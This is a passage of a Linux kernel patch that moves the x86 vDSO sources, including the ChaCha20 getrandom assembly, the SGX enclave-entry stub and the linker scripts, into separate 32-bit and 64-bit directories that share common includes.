- clock_getres;
- __vdso_clock_getres;
-#ifdef CONFIG_X86_SGX
- __vdso_sgx_enter_enclave;
-#endif
- getrandom;
- __vdso_getrandom;
- local: *;
- };
-}
diff --git a/arch/x86/entry/vdso/vdso32/Makefile b/arch/x86/entry/vdso/vdso32/Makefile
new file mode 100644
index 0000000..add6afb
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso32/Makefile
@@ -0,0 +1,24 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# 32-bit vDSO images for x86.
+#
+
+# The vDSOs built in this directory
+vdsos-y := 32
+
+# Files to link into the vDSO:
+vobjs-y := note.o vclock_gettime.o vgetcpu.o
+vobjs-y += system_call.o sigreturn.o
+
+# Compilation flags
+flags-y := -DBUILD_VDSO32 -m32 -mregparm=0
+flags-$(CONFIG_X86_64) += -include $(src)/fake_32bit_build.h
+flags-remove-y := -m64
+
+# The location of this include matters!
+include $(src)/../common/Makefile.include
+
+# Linker options for the vdso
+VDSO_LDFLAGS_32 := -m elf_i386 -soname linux-gate.so.1
+
+$(obj)/vdso32.so.dbg: $(vobjs)
diff --git a/arch/x86/entry/vdso/vdso32/note.S b/arch/x86/entry/vdso/vdso32/note.S
index 2cbd399..62d8aa5 100644
--- a/arch/x86/entry/vdso/vdso32/note.S
+++ b/arch/x86/entry/vdso/vdso32/note.S
@@ -1,18 +1 @@
-/* SPDX-License-Identifier: GPL-2.0 */
-/*
- * This supplies .note.* sections to go into the PT_NOTE inside the vDSO text.
- * Here we can supply some information useful to userland.
- */
-
-#include <linux/build-salt.h>
-#include <linux/version.h>
-#include <linux/elfnote.h>
-
-/* Ideally this would use UTS_NAME, but using a quoted string here
- doesn't work. Remember to change this when changing the
- kernel's name. */
-ELFNOTE_START(Linux, 0, "a")
- .long LINUX_VERSION_CODE
-ELFNOTE_END
-
-BUILD_SALT
+#include "common/note.S"
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index d33c651..2a15634 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -52,7 +52,7 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
-#ifdef CONFIG_X86_64
+#ifdef BUILD_VDSO32_64
/* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSENTER32, \
SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
diff --git a/arch/x86/entry/vdso/vdso32/vclock_gettime.c b/arch/x86/entry/vdso/vdso32/vclock_gettime.c
index 86981de..1481f00 100644
--- a/arch/x86/entry/vdso/vdso32/vclock_gettime.c
+++ b/arch/x86/entry/vdso/vdso32/vclock_gettime.c
@@ -1,4 +1 @@
-// SPDX-License-Identifier: GPL-2.0
-#define BUILD_VDSO32
-#include "fake_32bit_build.h"
-#include "../vclock_gettime.c"
+#include "common/vclock_gettime.c"
diff --git a/arch/x86/entry/vdso/vdso32/vdso32.lds.S b/arch/x86/entry/vdso/vdso32/vdso32.lds.S
index 8a3be07..8a85354 100644
--- a/arch/x86/entry/vdso/vdso32/vdso32.lds.S
+++ b/arch/x86/entry/vdso/vdso32/vdso32.lds.S
@@ -11,7 +11,7 @@
#define BUILD_VDSO32
-#include "../vdso-layout.lds.S"
+#include "common/vdso-layout.lds.S"
/* The ELF entry point can be used to set the AT_SYSINFO value. */
ENTRY(__kernel_vsyscall);
diff --git a/arch/x86/entry/vdso/vdso32/vgetcpu.c b/arch/x86/entry/vdso/vdso32/vgetcpu.c
index 3a9791f..00cc832 100644
--- a/arch/x86/entry/vdso/vdso32/vgetcpu.c
+++ b/arch/x86/entry/vdso/vdso32/vgetcpu.c
@@ -1,3 +1 @@
-// SPDX-License-Identifier: GPL-2.0
-#include "fake_32bit_build.h"
-#include "../vgetcpu.c"
+#include "common/vgetcpu.c"
diff --git a/arch/x86/entry/vdso/vdso64/Makefile b/arch/x86/entry/vdso/vdso64/Makefile
new file mode 100644
index 0000000..bfffaf1
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/Makefile
@@ -0,0 +1,46 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# 64-bit vDSO images for x86.
+#
+
+# The vDSOs built in this directory
+vdsos-y := 64
+vdsos-$(CONFIG_X86_X32_ABI) += x32
+
+# Files to link into the vDSO:
+vobjs-y := note.o vclock_gettime.o vgetcpu.o
+vobjs-y += vgetrandom.o vgetrandom-chacha.o
+vobjs-$(CONFIG_X86_SGX) += vsgx.o
+
+# Compilation flags
+flags-y := -DBUILD_VDSO64 -m64 -mcmodel=small
+
+# The location of this include matters!
+include $(src)/../common/Makefile.include
+
+#
+# X32 processes use x32 vDSO to access 64bit kernel data.
+#
+# Build x32 vDSO image:
+# 1. Compile x32 vDSO as 64bit.
+# 2. Convert object files to x32.
+# 3. Build x32 VDSO image with x32 objects, which contains 64bit codes
+# so that it can reach 64bit address space with 64bit pointers.
+#
+
+# Convert 64bit object file to x32 for x32 vDSO.
+quiet_cmd_x32 = X32 $@
+ cmd_x32 = $(OBJCOPY) -O elf32-x86-64 $< $@
+
+$(obj)/%-x32.o: $(obj)/%.o FORCE
+ $(call if_changed,x32)
+
+vobjsx32 = $(patsubst %.o,%-x32.o,$(vobjs))
+targets += $(patsubst %.o,%-x32.o,$(vobjs-y))
+
+# Linker options for the vdso
+VDSO_LDFLAGS_64 := -m elf_x86_64 -soname linux-vdso.so.1 -z max-page-size=4096
+VDSO_LDFLAGS_x32 := $(subst elf_x86_64,elf32_x86_64,$(VDSO_LDFLAGS_64))
+
+$(obj)/vdso64.so.dbg: $(vobjs)
+$(obj)/vdsox32.so.dbg: $(vobjsx32)
diff --git a/arch/x86/entry/vdso/vdso64/note.S b/arch/x86/entry/vdso/vdso64/note.S
new file mode 100644
index 0000000..62d8aa5
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/note.S
@@ -0,0 +1 @@
+#include "common/note.S"
diff --git a/arch/x86/entry/vdso/vdso64/vclock_gettime.c b/arch/x86/entry/vdso/vdso64/vclock_gettime.c
new file mode 100644
index 0000000..1481f00
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vclock_gettime.c
@@ -0,0 +1 @@
+#include "common/vclock_gettime.c"
diff --git a/arch/x86/entry/vdso/vdso64/vdso64.lds.S b/arch/x86/entry/vdso/vdso64/vdso64.lds.S
new file mode 100644
index 0000000..5ce3f2b
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vdso64.lds.S
@@ -0,0 +1,37 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * Linker script for 64-bit vDSO.
+ * We #include the file to define the layout details.
+ *
+ * This file defines the version script giving the user-exported symbols in
+ * the DSO.
+ */
+
+#define BUILD_VDSO64
+
+#include "common/vdso-layout.lds.S"
+
+/*
+ * This controls what userland symbols we export from the vDSO.
+ */
+VERSION {
+ LINUX_2.6 {
+ global:
+ clock_gettime;
+ __vdso_clock_gettime;
+ gettimeofday;
+ __vdso_gettimeofday;
+ getcpu;
+ __vdso_getcpu;
+ time;
+ __vdso_time;
+ clock_getres;
+ __vdso_clock_getres;
+#ifdef CONFIG_X86_SGX
+ __vdso_sgx_enter_enclave;
+#endif
+ getrandom;
+ __vdso_getrandom;
+ local: *;
+ };
+}
diff --git a/arch/x86/entry/vdso/vdso64/vdsox32.lds.S b/arch/x86/entry/vdso/vdso64/vdsox32.lds.S
new file mode 100644
index 0000000..3dbd20c
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vdsox32.lds.S
@@ -0,0 +1,27 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * Linker script for x32 vDSO.
+ * We #include the file to define the layout details.
+ *
+ * This file defines the version script giving the user-exported symbols in
+ * the DSO.
+ */
+
+#define BUILD_VDSOX32
+
+#include "common/vdso-layout.lds.S"
+
+/*
+ * This controls what userland symbols we export from the vDSO.
+ */
+VERSION {
+ LINUX_2.6 {
+ global:
+ __vdso_clock_gettime;
+ __vdso_gettimeofday;
+ __vdso_getcpu;
+ __vdso_time;
+ __vdso_clock_getres;
+ local: *;
+ };
+}
diff --git a/arch/x86/entry/vdso/vdso64/vgetcpu.c b/arch/x86/entry/vdso/vdso64/vgetcpu.c
new file mode 100644
index 0000000..00cc832
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vgetcpu.c
@@ -0,0 +1 @@
+#include "common/vgetcpu.c"
diff --git a/arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S b/arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S
new file mode 100644
index 0000000..bcba563
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S
@@ -0,0 +1,178 @@
+// SPDX-License-Identifier: GPL-2.0
+/*
+ * Copyright (C) 2022-2024 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
+ */
+
+#include <linux/linkage.h>
+#include <asm/frame.h>
+
+.section .rodata, "a"
+.align 16
+CONSTANTS: .octa 0x6b20657479622d323320646e61707865
+.text
+
+/*
+ * Very basic SSE2 implementation of ChaCha20. Produces a given positive number
+ * of blocks of output with a nonce of 0, taking an input key and 8-byte
+ * counter. Importantly does not spill to the stack. Its arguments are:
+ *
+ * rdi: output bytes
+ * rsi: 32-byte key input
+ * rdx: 8-byte counter input/output
+ * rcx: number of 64-byte blocks to write to output
+ */
+SYM_FUNC_START(__arch_chacha20_blocks_nostack)
+
+.set output, %rdi
+.set key, %rsi
+.set counter, %rdx
+.set nblocks, %rcx
+.set i, %al
+/* xmm registers are *not* callee-save. */
+.set temp, %xmm0
+.set state0, %xmm1
+.set state1, %xmm2
+.set state2, %xmm3
+.set state3, %xmm4
+.set copy0, %xmm5
+.set copy1, %xmm6
+.set copy2, %xmm7
+.set copy3, %xmm8
+.set one, %xmm9
+
+ /* copy0 = "expand 32-byte k" */
+ movaps CONSTANTS(%rip),copy0
+ /* copy1,copy2 = key */
+ movups 0x00(key),copy1
+ movups 0x10(key),copy2
+ /* copy3 = counter || zero nonce */
+ movq 0x00(counter),copy3
+ /* one = 1 || 0 */
+ movq $1,%rax
+ movq %rax,one
+
+.Lblock:
+ /* state0,state1,state2,state3 = copy0,copy1,copy2,copy3 */
+ movdqa copy0,state0
+ movdqa copy1,state1
+ movdqa copy2,state2
+ movdqa copy3,state3
+
+ movb $10,i
+.Lpermute:
+ /* state0 += state1, state3 = rotl32(state3 ^ state0, 16) */
+ paddd state1,state0
+ pxor state0,state3
+ movdqa state3,temp
+ pslld $16,temp
+ psrld $16,state3
+ por temp,state3
+
+ /* state2 += state3, state1 = rotl32(state1 ^ state2, 12) */
+ paddd state3,state2
+ pxor state2,state1
+ movdqa state1,temp
+ pslld $12,temp
+ psrld $20,state1
+ por temp,state1
+
+ /* state0 += state1, state3 = rotl32(state3 ^ state0, 8) */
+ paddd state1,state0
+ pxor state0,state3
+ movdqa state3,temp
+ pslld $8,temp
+ psrld $24,state3
+ por temp,state3
+
+ /* state2 += state3, state1 = rotl32(state1 ^ state2, 7) */
+ paddd state3,state2
+ pxor state2,state1
+ movdqa state1,temp
+ pslld $7,temp
+ psrld $25,state1
+ por temp,state1
+
+ /* state1[0,1,2,3] = state1[1,2,3,0] */
+ pshufd $0x39,state1,state1
+ /* state2[0,1,2,3] = state2[2,3,0,1] */
+ pshufd $0x4e,state2,state2
+ /* state3[0,1,2,3] = state3[3,0,1,2] */
+ pshufd $0x93,state3,state3
+
+ /* state0 += state1, state3 = rotl32(state3 ^ state0, 16) */
+ paddd state1,state0
+ pxor state0,state3
+ movdqa state3,temp
+ pslld $16,temp
+ psrld $16,state3
+ por temp,state3
+
+ /* state2 += state3, state1 = rotl32(state1 ^ state2, 12) */
+ paddd state3,state2
+ pxor state2,state1
+ movdqa state1,temp
+ pslld $12,temp
+ psrld $20,state1
+ por temp,state1
+
+ /* state0 += state1, state3 = rotl32(state3 ^ state0, 8) */
+ paddd state1,state0
+ pxor state0,state3
+ movdqa state3,temp
+ pslld $8,temp
+ psrld $24,state3
+ por temp,state3
+
+ /* state2 += state3, state1 = rotl32(state1 ^ state2, 7) */
+ paddd state3,state2
+ pxor state2,state1
+ movdqa state1,temp
+ pslld $7,temp
+ psrld $25,state1
+ por temp,state1
+
+ /* state1[0,1,2,3] = state1[3,0,1,2] */
+ pshufd $0x93,state1,state1
+ /* state2[0,1,2,3] = state2[2,3,0,1] */
+ pshufd $0x4e,state2,state2
+ /* state3[0,1,2,3] = state3[1,2,3,0] */
+ pshufd $0x39,state3,state3
+
+ decb i
+ jnz .Lpermute
+
+ /* output0 = state0 + copy0 */
+ paddd copy0,state0
+ movups state0,0x00(output)
+ /* output1 = state1 + copy1 */
+ paddd copy1,state1
+ movups state1,0x10(output)
+ /* output2 = state2 + copy2 */
+ paddd copy2,state2
+ movups state2,0x20(output)
+ /* output3 = state3 + copy3 */
+ paddd copy3,state3
+ movups state3,0x30(output)
+
+ /* ++copy3.counter */
+ paddq one,copy3
+
+ /* output += 64, --nblocks */
+ addq $64,output
+ decq nblocks
+ jnz .Lblock
+
+ /* counter = copy3.counter */
+ movq copy3,0x00(counter)
+
+ /* Zero out the potentially sensitive regs, in case nothing uses these again. */
+ pxor state0,state0
+ pxor state1,state1
+ pxor state2,state2
+ pxor state3,state3
+ pxor copy1,copy1
+ pxor copy2,copy2
+ pxor temp,temp
+
+ ret
+SYM_FUNC_END(__arch_chacha20_blocks_nostack)
diff --git a/arch/x86/entry/vdso/vdso64/vgetrandom.c b/arch/x86/entry/vdso/vdso64/vgetrandom.c
new file mode 100644
index 0000000..6a95d36
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vgetrandom.c
@@ -0,0 +1,15 @@
+// SPDX-License-Identifier: GPL-2.0-only
+/*
+ * Copyright (C) 2022-2024 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
+ */
+#include <linux/types.h>
+
+#include "lib/vdso/getrandom.c"
+
+ssize_t __vdso_getrandom(void *buffer, size_t len, unsigned int flags, void *opaque_state, size_t opaque_len)
+{
+ return __cvdso_getrandom(buffer, len, flags, opaque_state, opaque_len);
+}
+
+ssize_t getrandom(void *, size_t, unsigned int, void *, size_t)
+ __attribute__((weak, alias("__vdso_getrandom")));
diff --git a/arch/x86/entry/vdso/vdso64/vsgx.S b/arch/x86/entry/vdso/vdso64/vsgx.S
new file mode 100644
index 0000000..37a3d4c
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vsgx.S
@@ -0,0 +1,150 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+
+#include <linux/linkage.h>
+#include <asm/errno.h>
+#include <asm/enclu.h>
+
+#include "extable.h"
+
+/* Relative to %rbp. */
+#define SGX_ENCLAVE_OFFSET_OF_RUN 16
+
+/* The offsets relative to struct sgx_enclave_run. */
+#define SGX_ENCLAVE_RUN_TCS 0
+#define SGX_ENCLAVE_RUN_LEAF 8
+#define SGX_ENCLAVE_RUN_EXCEPTION_VECTOR 12
+#define SGX_ENCLAVE_RUN_EXCEPTION_ERROR_CODE 14
+#define SGX_ENCLAVE_RUN_EXCEPTION_ADDR 16
+#define SGX_ENCLAVE_RUN_USER_HANDLER 24
+#define SGX_ENCLAVE_RUN_USER_DATA 32 /* not used */
+#define SGX_ENCLAVE_RUN_RESERVED_START 40
+#define SGX_ENCLAVE_RUN_RESERVED_END 256
+
+.code64
+.section .text, "ax"
+
+SYM_FUNC_START(__vdso_sgx_enter_enclave)
+ /* Prolog */
+ .cfi_startproc
+ push %rbp
+ .cfi_adjust_cfa_offset 8
+ .cfi_rel_offset %rbp, 0
+ mov %rsp, %rbp
+ .cfi_def_cfa_register %rbp
+ push %rbx
+ .cfi_rel_offset %rbx, -8
+
+ mov %ecx, %eax
+.Lenter_enclave:
+ /* EENTER <= function <= ERESUME */
+ cmp $EENTER, %eax
+ jb .Linvalid_input
+ cmp $ERESUME, %eax
+ ja .Linvalid_input
+
+ mov SGX_ENCLAVE_OFFSET_OF_RUN(%rbp), %rcx
+
+ /* Validate that the reserved area contains only zeros. */
+ mov $SGX_ENCLAVE_RUN_RESERVED_START, %rbx
+1:
+ cmpq $0, (%rcx, %rbx)
+ jne .Linvalid_input
+ add $8, %rbx
+ cmpq $SGX_ENCLAVE_RUN_RESERVED_END, %rbx
+ jne 1b
+
+ /* Load TCS and AEP */
+ mov SGX_ENCLAVE_RUN_TCS(%rcx), %rbx
+ lea .Lasync_exit_pointer(%rip), %rcx
+
+ /* Single ENCLU serving as both EENTER and AEP (ERESUME) */
+.Lasync_exit_pointer:
+.Lenclu_eenter_eresume:
+ enclu
+
+ /* EEXIT jumps here unless the enclave is doing something fancy. */
+ mov SGX_ENCLAVE_OFFSET_OF_RUN(%rbp), %rbx
+
+ /* Set exit_reason. */
+ movl $EEXIT, SGX_ENCLAVE_RUN_LEAF(%rbx)
+
+ /* Invoke userspace's exit handler if one was provided. */
+.Lhandle_exit:
+ cmpq $0, SGX_ENCLAVE_RUN_USER_HANDLER(%rbx)
+ jne .Linvoke_userspace_handler
+
+ /* Success, in the sense that ENCLU was attempted. */
+ xor %eax, %eax
+
+.Lout:
+ pop %rbx
+ leave
+ .cfi_def_cfa %rsp, 8
+ RET
+
+ /* The out-of-line code runs with the pre-leave stack frame. */
+ .cfi_def_cfa %rbp, 16
+
+.Linvalid_input:
+ mov $(-EINVAL), %eax
+ jmp .Lout
+
+.Lhandle_exception:
+ mov SGX_ENCLAVE_OFFSET_OF_RUN(%rbp), %rbx
+
+ /* Set the exception info. */
+ mov %eax, (SGX_ENCLAVE_RUN_LEAF)(%rbx)
+ mov %di, (SGX_ENCLAVE_RUN_EXCEPTION_VECTOR)(%rbx)
+ mov %si, (SGX_ENCLAVE_RUN_EXCEPTION_ERROR_CODE)(%rbx)
+ mov %rdx, (SGX_ENCLAVE_RUN_EXCEPTION_ADDR)(%rbx)
+ jmp .Lhandle_exit
+
+.Linvoke_userspace_handler:
+ /* Pass the untrusted RSP (at exit) to the callback via %rcx. */
+ mov %rsp, %rcx
+
+ /* Save struct sgx_enclave_exception %rbx is about to be clobbered. */
+ mov %rbx, %rax
+
+ /* Save the untrusted RSP offset in %rbx (non-volatile register). */
+ mov %rsp, %rbx
+ and $0xf, %rbx
+
+ /*
+ * Align stack per x86_64 ABI. Note, %rsp needs to be 16-byte aligned
+ * _after_ pushing the parameters on the stack, hence the bonus push.
+ */
+ and $-0x10, %rsp
+ push %rax
+
+ /* Push struct sgx_enclave_exception as a param to the callback. */
+ push %rax
+
+ /* Clear RFLAGS.DF per x86_64 ABI */
+ cld
+
+ /*
+ * Load the callback pointer to %rax and lfence for LVI (load value
+ * injection) protection before making the call.
+ */
+ mov SGX_ENCLAVE_RUN_USER_HANDLER(%rax), %rax
+ lfence
+ call *%rax
+
+ /* Undo the post-exit %rsp adjustment. */
+ lea 0x10(%rsp, %rbx), %rsp
+
+ /*
+ * If the return from callback is zero or negative, return immediately,
+ * else re-execute ENCLU with the positive return value interpreted as
+ * the requested ENCLU function.
+ */
+ cmp $0, %eax
+ jle .Lout
+ jmp .Lenter_enclave
+
+ .cfi_endproc
+
+_ASM_VDSO_EXTABLE_HANDLE(.Lenclu_eenter_eresume, .Lhandle_exception)
+
+SYM_FUNC_END(__vdso_sgx_enter_enclave)
diff --git a/arch/x86/entry/vdso/vdsox32.lds.S b/arch/x86/entry/vdso/vdsox32.lds.S
deleted file mode 100644
index 16a8050..0000000
--- a/arch/x86/entry/vdso/vdsox32.lds.S
+++ /dev/null
@@ -1,27 +0,0 @@
-/* SPDX-License-Identifier: GPL-2.0 */
-/*
- * Linker script for x32 vDSO.
- * We #include the file to define the layout details.
- *
- * This file defines the version script giving the user-exported symbols in
- * the DSO.
- */
-
-#define BUILD_VDSOX32
-
-#include "vdso-layout.lds.S"
-
-/*
- * This controls what userland symbols we export from the vDSO.
- */
-VERSION {
- LINUX_2.6 {
- global:
- __vdso_clock_gettime;
- __vdso_gettimeofday;
- __vdso_getcpu;
- __vdso_time;
- __vdso_clock_getres;
- local: *;
- };
-}
diff --git a/arch/x86/entry/vdso/vgetcpu.c b/arch/x86/entry/vdso/vgetcpu.c
deleted file mode 100644
index e464030..0000000
--- a/arch/x86/entry/vdso/vgetcpu.c
+++ /dev/null
@@ -1,22 +0,0 @@
-// SPDX-License-Identifier: GPL-2.0-only
-/*
- * Copyright 2006 Andi Kleen, SUSE Labs.
- *
- * Fast user context implementation of getcpu()
- */
-
-#include <linux/kernel.h>
-#include <linux/getcpu.h>
-#include <asm/segment.h>
-#include <vdso/processor.h>
-
-notrace long
-__vdso_getcpu(unsigned *cpu, unsigned *node, struct getcpu_cache *unused)
-{
- vdso_read_cpunode(cpu, node);
-
- return 0;
-}
-
-long getcpu(unsigned *cpu, unsigned *node, struct getcpu_cache *tcache)
- __attribute__((weak, alias("__vdso_getcpu")));
diff --git a/arch/x86/entry/vdso/vgetrandom-chacha.S b/arch/x86/entry/vdso/vgetrandom-chacha.S
deleted file mode 100644
index bcba563..0000000
--- a/arch/x86/entry/vdso/vgetrandom-chacha.S
+++ /dev/null
@@ -1,178 +0,0 @@
-// SPDX-License-Identifier: GPL-2.0
-/*
- * Copyright (C) 2022-2024 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
- */
-
-#include <linux/linkage.h>
-#include <asm/frame.h>
-
-.section .rodata, "a"
-.align 16
-CONSTANTS: .octa 0x6b20657479622d323320646e61707865
-.text
-
-/*
- * Very basic SSE2 implementation of ChaCha20. Produces a given positive number
- * of blocks of output with a nonce of 0, taking an input key and 8-byte
- * counter. Importantly does not spill to the stack. Its arguments are:
- *
- * rdi: output bytes
- * rsi: 32-byte key input
- * rdx: 8-byte counter input/output
- * rcx: number of 64-byte blocks to write to output
- */
-SYM_FUNC_START(__arch_chacha20_blocks_nostack)
-
-.set output, %rdi
-.set key, %rsi
-.set counter, %rdx
-.set nblocks, %rcx
-.set i, %al
-/* xmm registers are *not* callee-save. */
-.set temp, %xmm0
-.set state0, %xmm1
-.set state1, %xmm2
-.set state2, %xmm3
-.set state3, %xmm4
-.set copy0, %xmm5
-.set copy1, %xmm6
-.set copy2, %xmm7
-.set copy3, %xmm8
-.set one, %xmm9
-
- /* copy0 = "expand 32-byte k" */
- movaps CONSTANTS(%rip),copy0
- /* copy1,copy2 = key */
- movups 0x00(key),copy1
- movups 0x10(key),copy2
- /* copy3 = counter || zero nonce */
- movq 0x00(counter),copy3
- /* one = 1 || 0 */
- movq $1,%rax
- movq %rax,one
-
-.Lblock:
- /* state0,state1,state2,state3 = copy0,copy1,copy2,copy3 */
- movdqa copy0,state0
- movdqa copy1,state1
- movdqa copy2,state2
- movdqa copy3,state3
-
- movb $10,i
-.Lpermute:
- /* state0 += state1, state3 = rotl32(state3 ^ state0, 16) */
- paddd state1,state0
- pxor state0,state3
- movdqa state3,temp
- pslld $16,temp
- psrld $16,state3
- por temp,state3
-
- /* state2 += state3, state1 = rotl32(state1 ^ state2, 12) */
- paddd state3,state2
- pxor state2,state1
- movdqa state1,temp
- pslld $12,temp
- psrld $20,state1
- por temp,state1
-
- /* state0 += state1, state3 = rotl32(state3 ^ state0, 8) */
- paddd state1,state0
- pxor state0,state3
- movdqa state3,temp
- pslld $8,temp
- psrld $24,state3
- por temp,state3
-
- /* state2 += state3, state1 = rotl32(state1 ^ state2, 7) */
- paddd state3,state2
- pxor state2,state1
- movdqa state1,temp
- pslld $7,temp
- psrld $25,state1
- por temp,state1
-
- /* state1[0,1,2,3] = state1[1,2,3,0] */
- pshufd $0x39,state1,state1
- /* state2[0,1,2,3] = state2[2,3,0,1] */
- pshufd $0x4e,state2,state2
- /* state3[0,1,2,3] = state3[3,0,1,2] */
- pshufd $0x93,state3,state3
-
- /* state0 += state1, state3 = rotl32(state3 ^ state0, 16) */
- paddd state1,state0
- pxor state0,state3
- movdqa state3,temp
- pslld $16,temp
- psrld $16,state3
- por temp,state3
-
- /* state2 += state3, state1 = rotl32(state1 ^ state2, 12) */
- paddd state3,state2
- pxor state2,state1
- movdqa state1,temp
- pslld $12,temp
- psrld $20,state1
- por temp,state1
-
- /* state0 += state1, state3 = rotl32(state3 ^ state0, 8) */
- paddd state1,state0
- pxor state0,state3
- movdqa state3,temp
- pslld $8,temp
- psrld $24,state3
- por temp,state3
-
- /* state2 += state3, state1 = rotl32(state1 ^ state2, 7) */
- paddd state3,state2
- pxor state2,state1
- movdqa state1,temp
- pslld $7,temp
- psrld $25,state1
- por temp,state1
-
- /* state1[0,1,2,3] = state1[3,0,1,2] */
- pshufd $0x93,state1,state1
- /* state2[0,1,2,3] = state2[2,3,0,1] */
- pshufd $0x4e,state2,state2
- /* state3[0,1,2,3] = state3[1,2,3,0] */
- pshufd $0x39,state3,state3
-
- decb i
- jnz .Lpermute
-
- /* output0 = state0 + copy0 */
- paddd copy0,state0
- movups state0,0x00(output)
- /* output1 = state1 + copy1 */
- paddd copy1,state1
- movups state1,0x10(output)
- /* output2 = state2 + copy2 */
- paddd copy2,state2
- movups state2,0x20(output)
- /* output3 = state3 + copy3 */
- paddd copy3,state3
- movups state3,0x30(output)
-
- /* ++copy3.counter */
- paddq one,copy3
-
- /* output += 64, --nblocks */
- addq $64,output
- decq nblocks
- jnz .Lblock
-
- /* counter = copy3.counter */
- movq copy3,0x00(counter)
-
- /* Zero out the potentially sensitive regs, in case nothing uses these again. */
- pxor state0,state0
- pxor state1,state1
- pxor state2,state2
- pxor state3,state3
- pxor copy1,copy1
- pxor copy2,copy2
- pxor temp,temp
-
- ret
-SYM_FUNC_END(__arch_chacha20_blocks_nostack)
diff --git a/arch/x86/entry/vdso/vgetrandom.c b/arch/x86/entry/vdso/vgetrandom.c
deleted file mode 100644
index 430862b..0000000
--- a/arch/x86/entry/vdso/vgetrandom.c
+++ /dev/null
@@ -1,15 +0,0 @@
-// SPDX-License-Identifier: GPL-2.0-only
-/*
- * Copyright (C) 2022-2024 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
- */
-#include <linux/types.h>
-
-#include "../../../../lib/vdso/getrandom.c"
-
-ssize_t __vdso_getrandom(void *buffer, size_t len, unsigned int flags, void *opaque_state, size_t opaque_len)
-{
- return __cvdso_getrandom(buffer, len, flags, opaque_state, opaque_len);
-}
-
-ssize_t getrandom(void *, size_t, unsigned int, void *, size_t)
- __attribute__((weak, alias("__vdso_getrandom")));
diff --git a/arch/x86/entry/vdso/vsgx.S b/arch/x86/entry/vdso/vsgx.S
deleted file mode 100644
index 37a3d4c..0000000
--- a/arch/x86/entry/vdso/vsgx.S
+++ /dev/null
@@ -1,150 +0,0 @@
-/* SPDX-License-Identifier: GPL-2.0 */
-
-#include <linux/linkage.h>
-#include <asm/errno.h>
-#include <asm/enclu.h>
-
-#include "extable.h"
-
-/* Relative to %rbp. */
-#define SGX_ENCLAVE_OFFSET_OF_RUN 16
-
-/* The offsets relative to struct sgx_enclave_run. */
-#define SGX_ENCLAVE_RUN_TCS 0
-#define SGX_ENCLAVE_RUN_LEAF 8
-#define SGX_ENCLAVE_RUN_EXCEPTION_VECTOR 12
-#define SGX_ENCLAVE_RUN_EXCEPTION_ERROR_CODE 14
-#define SGX_ENCLAVE_RUN_EXCEPTION_ADDR 16
-#define SGX_ENCLAVE_RUN_USER_HANDLER 24
-#define SGX_ENCLAVE_RUN_USER_DATA 32 /* not used */
-#define SGX_ENCLAVE_RUN_RESERVED_START 40
-#define SGX_ENCLAVE_RUN_RESERVED_END 256
-
-.code64
-.section .text, "ax"
-
-SYM_FUNC_START(__vdso_sgx_enter_enclave)
- /* Prolog */
- .cfi_startproc
- push %rbp
- .cfi_adjust_cfa_offset 8
- .cfi_rel_offset %rbp, 0
- mov %rsp, %rbp
- .cfi_def_cfa_register %rbp
- push %rbx
- .cfi_rel_offset %rbx, -8
-
- mov %ecx, %eax
-.Lenter_enclave:
- /* EENTER <= function <= ERESUME */
- cmp $EENTER, %eax
- jb .Linvalid_input
- cmp $ERESUME, %eax
- ja .Linvalid_input
-
- mov SGX_ENCLAVE_OFFSET_OF_RUN(%rbp), %rcx
-
- /* Validate that the reserved area contains only zeros. */
- mov $SGX_ENCLAVE_RUN_RESERVED_START, %rbx
-1:
- cmpq $0, (%rcx, %rbx)
- jne .Linvalid_input
- add $8, %rbx
- cmpq $SGX_ENCLAVE_RUN_RESERVED_END, %rbx
- jne 1b
-
- /* Load TCS and AEP */
- mov SGX_ENCLAVE_RUN_TCS(%rcx), %rbx
- lea .Lasync_exit_pointer(%rip), %rcx
-
- /* Single ENCLU serving as both EENTER and AEP (ERESUME) */
-.Lasync_exit_pointer:
-.Lenclu_eenter_eresume:
- enclu
-
- /* EEXIT jumps here unless the enclave is doing something fancy. */
- mov SGX_ENCLAVE_OFFSET_OF_RUN(%rbp), %rbx
-
- /* Set exit_reason. */
- movl $EEXIT, SGX_ENCLAVE_RUN_LEAF(%rbx)
-
- /* Invoke userspace's exit handler if one was provided. */
-.Lhandle_exit:
- cmpq $0, SGX_ENCLAVE_RUN_USER_HANDLER(%rbx)
- jne .Linvoke_userspace_handler
-
- /* Success, in the sense that ENCLU was attempted. */
- xor %eax, %eax
-
-.Lout:
- pop %rbx
- leave
- .cfi_def_cfa %rsp, 8
- RET
-
- /* The out-of-line code runs with the pre-leave stack frame. */
- .cfi_def_cfa %rbp, 16
-
-.Linvalid_input:
- mov $(-EINVAL), %eax
- jmp .Lout
-
-.Lhandle_exception:
- mov SGX_ENCLAVE_OFFSET_OF_RUN(%rbp), %rbx
-
- /* Set the exception info. */
